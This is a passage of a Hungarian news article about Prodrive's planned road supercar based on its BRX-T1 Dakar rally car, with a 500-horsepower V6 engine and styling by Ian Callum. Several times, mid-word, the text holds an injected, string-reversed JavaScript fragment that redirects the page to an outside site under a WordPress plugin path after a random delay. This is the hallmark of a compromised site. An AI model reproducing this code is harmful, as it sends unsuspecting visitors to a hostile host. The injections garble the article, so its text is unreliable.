A sivatag Ferrarija-címre törne következő projektjével a Dakar-ralin idén bemutatkozó Prodrive csapata. A szuperautó alapját értelemszerűen a januári megmérettetésen is használt BRX-T1 adná, és ahogyan azt is, a komoly tapasztalattal rendelkező, korábban Astoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton Martinok, Fordok és Jaguarok tervezésében is közreműködő Ian Callum tervezné – írja az Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocar. Egy módosítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, 3,5 literes motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor hajtaná az utcai használatra tervezett Prodrive-ot: a V6-os ikerturbós hajtáslánc teljesítményére 500 lóerő számolnak, vagyis a várhatóan Hunter néven futó autó mintegy 100 lóerővel erősebb lenne a versenyváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozatnál. David Richards alapító és vezérigazgató „szofisztikált erőátvitelről” beszélt, de hogy a hatsebességes szekvenciális sebességváltót takarja-e, nem derült ki. Szintén homály fedi,…
- Hirdetés -